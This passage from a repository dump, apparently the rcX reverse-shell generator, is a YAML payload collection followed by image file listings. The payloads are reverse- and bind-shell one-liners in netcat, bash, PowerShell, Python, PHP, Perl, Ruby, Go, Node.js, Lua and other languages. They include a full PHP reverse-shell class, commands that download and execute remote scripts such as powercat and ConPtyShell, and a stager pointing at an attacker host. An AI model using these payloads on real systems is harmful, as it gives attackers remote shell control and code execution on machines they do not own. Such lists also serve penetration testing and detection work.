44 | {host} {port} >/tmp/f 45 | nc-mknod: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} 46 | {host} {port} >/tmp/f 47 | DotnetCat: dncat -e {shell_path} {host} -p {port} 48 | netcat-windows: 49 | nc: "{binary_name} -e {shell_path} {host} {port}{nc_args}" 50 | nc-c: "{binary_name} {host} {port} -c {shell_path}{nc_args}" 51 | ncat: ncat -e {shell_path} {host} {port}{ncat_args} 52 | ncat-c: ncat -c {shell_path} {host} {port}{ncat_args} 53 | DotnetCat: dncat -e {shell_path} {host} -p {port} 54 | netcat-password: 55 | nc-c: nc -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' 56 | {host} {port} 57 | ncat-c: ncat -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} 58 | -i;esac' {host} {port} 59 | nc-mkfifo: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read 60 | k;case $k in '{password}')bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f 61 | nc-mknod: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read 62 | k;case $k in "{password}")bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f 63 | netcat-ssl: 64 | ncat: ncat -e {shell_path} {host} {port} --ssl 65 | ncat-c: ncat -c {shell_path} {host} {port} --ssl 66 | netcat-ssl-password: 67 | ncat-c: ncat --ssl -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} 68 | -i;esac' {host} {port} 69 | netcat-windows-password: 70 | ncat-c: '{binary_name}{ncat_args} -c "echo|set /p=%random%=&powershell $k=Read-Host;write-host 71 | $k=;if($k -eq ''{password}''){{{shell_path}}}" {host} {port}' 72 | telnet-linux: 73 | telnet: rm -f /tmp/p;mknod /tmp/p p && {binary_name} {host} {port} 0/tmp/p 74 | telnet-two_ports: "{binary_name} {host} {port}|{shell_path}|telnet {host} {port2}" 75 | openssl-linux: 76 | openssl: mkfifo /tmp/s;{shell_path} -i &1|{binary_name} s_client -quiet 77 | -connect {host}:{port}>/tmp/s;rm /tmp/s 78 | openssl-2: mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect 79 | {host}:{port} > fifo; rm fifo 80 | python: 81 | python: '{binary_name} -c "import socket,threading as t,subprocess as s;c=socket.socket();c.connect((''{host}'',{port}));p=s.Popen(''{shell_path}'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() 82 | for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) 83 | for _ in iter(int,1)],).start();p.wait()"' 84 | python-exec: '{binary_name} -c "exec(''import os,socket,threading as t,subprocess 85 | as s\ndef i():\n while 1:\n try:\n p.stdin.write(c.recv(1024).decode());p.stdin.flush()\n except:\n os._exit(0)\ndef 86 | j():\n while 1:\n try:c.send(p.stdout.read(1).encode())\n except:pass\nc=socket.socket()\np=s.Popen(\''{shell_path}\'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\nfor 87 | _ in range(9):\n try:\n c.connect((\''{host}\'',{port}));break\n except:\n pass\nt.Thread(target=i,).start();t.Thread(target=j,).start()\np.wait()'')"' 88 | python-pty: '{binary_name} -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((''{host}'',{port}));os.dup2(s.fileno(),0); 89 | os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(''{shell_path}'')"' 90 | python-pty-short: '{binary_name} -c "a=__import__;s=a(''socket'');o=a(''os'').dup2;p=a(''pty'').spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect((''{host}'',{port}));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p(''{shell_path}'')"' 91 | python-subprocess1: '{binary_name} -c "socket=__import__(''socket'');subprocess=__import__(''subprocess'');os=__import__(''os'');s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((''{host}'',{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([''{shell_path}'',''-i''])"' 92 | python-subprocess2: '{binary_name} -c "a=__import__;b=a(''socket'').socket;p=a(''subprocess'').call;o=a(''os'').dup2;s=b();s.connect((''{host}'',{port}));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p([''{shell_path}'',''-i''])"' 93 | pwncat: pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args} 94 | python-windows: 95 | python: '{binary_name} -c "import socket,threading as t,subprocess as s;c=socket.socket();c.connect((''{host}'',{port}));p=s.Popen(''{shell_path}'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() 96 | for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) 97 | for _ in iter(int,1)],).start();p.wait()"' 98 | python-exec: '{binary_name} -c "exec(''import os,socket,threading as t,subprocess 99 | as s\ndef i():\n while 1:\n try:\n p.stdin.write(c.recv(1024).decode());p.stdin.flush()\n except:\n os._exit(0)\ndef 100 | j():\n while 1:\n try:c.send(p.stdout.read(1).encode())\n except:pass\nc=socket.socket()\np=s.Popen(\''{shell_path}\'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\nfor 101 | _ in range(9):\n try:\n c.connect((\''{host}\'',{port}));break\n except:\n pass\nt.Thread(target=i,).start();t.Thread(target=j,).start()\np.wait()'')"' 102 | pwncat: pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args} 103 | powershell: 104 | powershell-1: '{binary_name} /nop /c "$client=New-Object System.Net.Sockets.TCPClient(''{host}'',{port});$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{{0}};while(($i=$stream.Read($bytes,0,$bytes.Length)) 105 | -ne 0){{;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex 106 | $data 2>&1|Out-String);$sendback2= $sendback+''PS ''+(pwd).Path+''>'';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"' 107 | powershell-2: '{binary_name} /nop /noni /ep bypass /c "$TCPClient=New-Object Net.Sockets.TCPClient(''{host}'',{port});$NetworkStream=$TCPClient.GetStream();$StreamWriter=New-Object 108 | IO.StreamWriter($NetworkStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+''>'');$StreamWriter.Flush()}}WriteToStream'''';while(($BytesRead=$NetworkStream.Read($Buffer,0,$Buffer.Length)) 109 | -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer, 0,$BytesRead-1);$Output=try{{Invoke-Expression 110 | $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()"' 111 | powershell-ssl: '{binary_name} /nop /noni /ep bypass /c "$TCPClient=New-Object 112 | Net.Sockets.TCPClient(''{host}'',{port});$NetworkStream=$TCPClient.GetStream();$SslStream=New-Object 113 | Net.Security.SslStream($NetworkStream,$false,({{$true}} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient(''cloudflare-dns.com'',$null,$false);if(!$SslStream.IsEncrypted 114 | -or !$SslStream.IsSigned){{$SslStream.Close();exit}}$StreamWriter=New-Object 115 | IO.StreamWriter($SslStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+''>'');$StreamWriter.Flush()}};WriteToStream'''';while(($BytesRead=$SslStream.Read($Buffer,0,$Buffer.Length)) 116 | -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer,0,$BytesRead-1);$Output=try{{Invoke-Expression 117 | $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()"' 118 | powershell-ConPty: '{binary_name} "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 119 | -UseBasicParsing);Invoke-ConPtyShell {host} {port}"' 120 | powercat-Github-1: '{binary_name} "IEX(IWR https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat 121 | -c {host} -p {port} -e {shell_path}"' 122 | powercat-Github-2: '{binary_name} "IEX(curl https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat 123 | -c {host} -p {port} -e {shell_path}"' 124 | powercat-Github-3: '{binary_name} "IEX(New-Object System.Net.WebClient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat 125 | -c {host} -p {port} -e {shell_path}"' 126 | csharp: 127 | csharp-csc: echo using System;using System.IO;using System.Net;using System.Net.Sockets;using 128 | System.Text;using System.Diagnostics;public class i{{public static TcpClient 129 | c;public static NetworkStream s;public static StreamReader r;public static StreamWriter 130 | w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new 131 | StringBuilder();if(!c.Connected){{try{{c.Connect("{host}",{port});s=c.GetStream();r=new 132 | StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process 133 | h;h=new Process();h.StartInfo.FileName="{shell_path}";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new 134 | DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public 135 | static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder 136 | strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}>%tmp%\0&&for,/f,%p,in,('where,/r,%systemroot%\Microsoft.NET\Framework,csc.exe'),do,%p 137 | /out:%tmp%\0.exe %tmp%\0&&%tmp%\0.exe&&del,/q %tmp%\0.exe %tmp%\0 138 | csharp-powershell-code: |- 139 | $j=get-random;$d=@" 140 | using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class i$j{{public static TcpClient c;public static NetworkStream s;public static StreamReader r;public static StreamWriter w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new StringBuilder();if(!c.Connected){{try{{c.Connect("{host}",{port});s=c.GetStream();r=new StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process h;h=new Process();h.StartInfo.FileName="{shell_path}";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}} 141 | "@;Add-Type -TypeDefinition $d -Language CSharp;iex "[i$j]::Main()" 142 | php: 143 | php-exec: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});exec(''{shell_path} 144 | <&3 >&3 2>&3'');"' 145 | php-shell_exec: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});shell_exec(''{shell_path} 146 | <&3 >&3 2>&3'');"' 147 | php-system: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});system(''{shell_path} 148 | -i <&3 >&3 2>&3'');"' 149 | php-passthru: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});passthru(''{shell_path} 150 | -i <&3 >&3 2>&3'');"' 151 | php-popen: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});popen(''{shell_path} 152 | -i <&3 >&3 2>&3",''r'');"' 153 | php-proc_open: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});$proc=proc_open(''{shell_path}'',array(0=>$sock,1=>$sock,2=>$sock),$pipes);"' 154 | php-backtick: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});`{shell_path} 155 | <&3 >&3 2>&3`;"' 156 | php-code: 'array(''pipe'',''r''),1=>array(''pipe'',''w''),2=>array(''pipe'',''w''));private 158 | $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private 159 | function detect(){{$detected=true;if(stripos(PHP_OS,''LINUX'')!==false){{$this->os=''LINUX'';$this->s=''/bin/sh'';}}else 160 | if(stripos(PHP_OS,''WIN32'')!==false||stripos(PHP_OS,''WINNT'')!==false||stripos(PHP_OS,''WINDOWS'')!==false){{$this->os=''WINDOWS'';$this->s=''cmd.exe'';}}else{{$detected=false;}}return 161 | $detected;}}private function daemonize(){{$exit=false;if(!function_exists(''pcntl_fork'')){{}}else 162 | if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return 163 | $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private 164 | function dump($data){{$data=str_replace(''<'',''<'',$data);$data=str_replace(''>'',''>'',$data);}}private 165 | function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return 166 | $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return 167 | $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os===''WINDOWS''&&$oname===''STDIN''){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private 168 | function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat[''size''];if($this->os===''WINDOWS''&&$iname===''STDOUT''&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public 169 | function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo"{{$errno}}: 170 | {{$errstr}}";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes 171 | as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,"PID:{{$status[''pid'']}}");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else 172 | if(feof($pipes[1])||!$status[''running'']){{break;}}$streams=array(''read''=>array($socket,$pipes[1],$pipes[2]),''write''=>null,''except''=>null);$num_changed_streams=@stream_select($streams[''read''],$streams[''write''],$streams[''except''],0);if($num_changed_streams===false){{break;}}else 173 | if($num_changed_streams>0){{if($this->os===''LINUX''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(in_array($pipes[2],$streams[''read''])){{$this->rw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(in_array($pipes[1],$streams[''read''])){{$this->rw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}else 174 | if($this->os===''WINDOWS''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(($fstat=fstat($pipes[2]))&&$fstat[''size'']){{$this->brw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(($fstat=fstat($pipes[1]))&&$fstat[''size'']){{$this->brw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}}}}}while(!$this->error);foreach($pipes 175 | as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new 176 | S(''{host}'',{port});$sh->run();unset($sh);?>' 177 | php-windows: 178 | php: 'echo "array(''pipe'',''r''),1=>array(''pipe'',''w''),2=>array(''pipe'',''w''));private 180 | $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private 181 | function detect(){{$detected=true;if(stripos(PHP_OS,''LINUX'')!==false){{$this->os=''LINUX'';$this->s=''/bin/sh'';}}else 182 | if(stripos(PHP_OS,''WIN32'')!==false||stripos(PHP_OS,''WINNT'')!==false||stripos(PHP_OS,''WINDOWS'')!==false){{$this->os=''WINDOWS'';$this->s=''cmd.exe'';}}else{{$detected=false;}}return 183 | $detected;}}private function daemonize(){{$exit=false;if(!function_exists(''pcntl_fork'')){{}}else 184 | if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return 185 | $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private 186 | function dump($data){{$data=str_replace(''<'',''<'',$data);$data=str_replace(''>'',''>'',$data);}}private 187 | function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return 188 | $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return 189 | $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os===''WINDOWS''&&$oname===''STDIN''){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private 190 | function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat[''size''];if($this->os===''WINDOWS''&&$iname===''STDOUT''&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public 191 | function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo"{{$errno}}: 192 | {{$errstr}}";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes 193 | as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,"PID:{{$status[''pid'']}}");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else 194 | if(feof($pipes[1])||!$status[''running'']){{break;}}$streams=array(''read''=>array($socket,$pipes[1],$pipes[2]),''write''=>null,''except''=>null);$num_changed_streams=@stream_select($streams[''read''],$streams[''write''],$streams[''except''],0);if($num_changed_streams===false){{break;}}else 195 | if($num_changed_streams>0){{if($this->os===''LINUX''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(in_array($pipes[2],$streams[''read''])){{$this->rw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(in_array($pipes[1],$streams[''read''])){{$this->rw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}else 196 | if($this->os===''WINDOWS''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(($fstat=fstat($pipes[2]))&&$fstat[''size'']){{$this->brw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(($fstat=fstat($pipes[1]))&&$fstat[''size'']){{$this->brw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}}}}}while(!$this->error);foreach($pipes 197 | as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new 198 | S(''{host}'',{port});$sh->run();unset($sh);?>"|{binary_name}' 199 | ruby-linux: 200 | ruby-spawn: '{binary_name} -rsocket -e"spawn(''{shell_path}'',[:in,:out,:err]=>TCPSocket.new(''{host}'',{port}))"' 201 | ruby-sprintf: '{binary_name} -rsocket -e"f=TCPSocket.open(''{host}'',{port}).to_i;exec 202 | sprintf(''{shell_path} -i <&%d >&%d 2>&%d'',f,f,f)"' 203 | ruby-new: '{binary_name} -rsocket -e "exit if fork;c=TCPSocket.new(''{host}'',{port});loop{{c.gets.chomp!;(exit! 204 | if $_==''exit'');($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){{|io|c.print 205 | io.read}}))rescue c.puts ''failed: #{{$_}}''}}"' 206 | ruby-windows: '{binary_name} -rsocket -e "c=TCPSocket.new(''{host}'',''{port}'');while(cmd=c.gets);IO.popen({shell_path},''r''){{|io|c.print 207 | io.read}}end"' 208 | socat: 209 | socat: "{binary_name} {protocol}:{host}:{port} EXEC:{shell_path}{socat_args}" 210 | socat-tty: "{binary_name} {protocol}:{host}:{port} EXEC:'{shell_path}',pty,stderr,setsid,sigint,sane" 211 | socat-linux: wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat 212 | -O /tmp/socat;chmod +x /tmp/socat;/tmp/socat exec:'{shell_path} -li',pty,stderr,setsid,sigint,sane 213 | {protocol}:{host}:{port} 214 | golang-linux: 215 | golang: echo 'package main;import"os/exec";import"net";func main(){{c,_:=net.Dial("tcp","{host}:{port}");cmd:=exec.Command("{shell_path}");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}'>/tmp/t.go 216 | &&{binary_name} run /tmp/t.go&&rm /tmp/t.go 217 | golang-windows: 218 | golang: echo package main;import"os/exec";import"net";func main(){{c,_:=net.Dial("tcp","{host}:{port}");cmd:=exec.Command("{shell_path}");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}>%tmp%\0.go&{binary_name} 219 | run %tmp%\0.go&del %tmp%\0.go %tmp%\0 220 | perl-linux: 221 | perl: '{binary_name} -e ''use Socket;$i="{host}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("{protocol}"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("{shell_path} 222 | -i");}};''' 223 | perl-2: '{binary_name} -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{host}:{port}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ 224 | while<>;''' 225 | perl-windows: 226 | perl: '{binary_name} -e "use Socket;$i=''{host}'';$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(''{protocol}''));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,''>&S'');open(STDOUT,''>&S'');open(STDERR,''>&S'');exec(''{shell_path}'');}};"' 227 | perl-2: '{binary_name} -MIO -e "$c=new IO::Socket::INET(PeerAddr,''{host}:{port}'');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ 228 | while<>;"' 229 | java: 230 | java-jar: "{binary_name} -jar Reverse_Shell.jar {host} {port}" 231 | java-jar-github: wget -q https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/main/jar/Reverse_Shell.jar 232 | -O 0&&java -jar 0 {host} {port}&&del 0||rm 0 233 | java-jar3: "{binary_name} -jar JavaStager-0.1-initial.jar http://attackerip/payload.java" 234 | java-jsp: https://github.com/tennc/webshell/blob/master/jsp/jsp-reverse.jsp 235 | java-jsp2: https://github.com/ivan-sincek/java-reverse-tcp/blob/main/jsp/reverse/jsp_reverse_shell.jsp 236 | java-jsp-msfvenom: msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} 237 | -f raw>reverse.jsp 238 | java-war-msfvenom: msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} 239 | -f war>reverse.war 240 | nodejs-linux: 241 | nodejs-async: echo 'require("child_process").exec("{shell_path} -i >& /dev/tcp/{host}/{port} 242 | 0>&1")'|{binary_name} 243 | nodejs-sync: echo 'require("child_process").execSync("{shell_path} -i >& /dev/tcp/{host}/{port} 244 | 0>&1")'|{binary_name} 245 | nodejs-spawn: echo '!function(){{var e=require("net"),n=require("child_process"),r=n.spawn("{shell_path}",[]),t=new 246 | e.Socket;return t.connect({port},"{host}",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();'|{binary_name} 247 | nodejs-windows: 248 | nodejs-async: echo require('child_process').exec('nc -e {shell_path} {host} {port}')|{binary_name} 249 | nodejs-sync: echo require('child_process').execSync('nc -e {shell_path} {host} 250 | {port}')|{binary_name} 251 | nodejs-spawn: echo !function(){{var e=require("net"),n=require("child_process"),r=n.spawn("{shell_path}",[]),t=new 252 | e.Socket;return t.connect({port},"{host}",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();|{binary_name} 253 | lua: 254 | lua5.1: lua5.1 -e 'local host, port = "{host}", {port} local socket = require("socket") 255 | local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while 256 | true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") 257 | local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break 258 | end end tcp:close()' 259 | lua-linux: '{binary_name} -e "require(''socket'');require(''os'');t=socket.tcp();t:connect(''{host}'',''{port}'');os.execute(''{shell_path} 260 | -i <&3 >&3 2>&3'');"' 261 | custom_payload_type: 262 | custom_payload_name: custom_payload_value 263 | bind: 264 | bash: 265 | bash-bind: rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} 266 | >/tmp/m 267 | netcat: 268 | nc: rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} >/tmp/m 269 | nc-e: "{binary_name} -Lnp {port} -e {shell_path}{nc_args}" 270 | ncat-e: ncat -lnp {port} -e {shell_path}{ncat_args} 271 | ncat-ssl: ncat -lnp {port} -e {shell_path} --ssl 272 | DotnetCat: dncat -lp {port} -e {shell_path} 273 | socat: 274 | socat: "{binary_name} -d -d {protocol}4-LISTEN:{port} EXEC:'{shell_path}'{socat_args}" 275 | socat-ssl: "{binary_name} OPENSSL-LISTEN:{port},cert=bind.pem,verify=0,fork EXEC:'{shell_path}'{socat_args}" 276 | python: 277 | python-bind: '{binary_name} -c "import subprocess as u;c=__import__(''socket'').socket();c.bind((''{host}'',{port}));c.listen(0);cc,a=c.accept();p=u.Popen([''{shell_path}''],stdin=u.PIPE,stdout=u.PIPE,stderr=u.STDOUT);r=__import__(''threading'').Thread(target=lambda:[cc.send(p.stdout.read(1024)) 278 | for _ in iter(int,1)],);r.start();[p.stdin.flush() for _ in iter(int, 1) if 279 | p.stdin.write(cc.recv(1024))]"' 280 | pwncat: pwncat -l {host} {port} -e {shell_path}{pwncat_args} 281 | perl-linux: 282 | perl-bind: '{binary_name} -e ''use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("{protocol}"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close 283 | C){{open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("{shell_path} 284 | -i");}};''' 285 | perl-windows: 286 | perl-bind: '{binary_name} -e "use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(''{protocol}''));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close 287 | C){{open(STDIN,''>&C'');open(STDOUT,''>&C'');open(STDERR,''>&C'');exec(''{shell_path}'');}};"' 288 | golang: 289 | gotty-webshell: gotty {gotty_args}-w --reconnect {shell_path} 290 | custom_payload_type: 291 | custom_payload_name: custom_payload_value 292 | -------------------------------------------------------------------------------- /rcX-png/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/favicon.ico -------------------------------------------------------------------------------- /rcX-png/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/logo.png -------------------------------------------------------------------------------- /rcX-png/rcx-main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/rcx-main.png -------------------------------------------------------------------------------- /rcX-png/rcx-obf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FlyfishSec/rcX/254b7a99dd9c8f25097048ff7d7fc60283277570/rcX-png/rcx-obf.png -------------------------------------------------------------------------------- /rcX-png/rcx-online-curl.gif: -------------------------------------------------------------------------------- 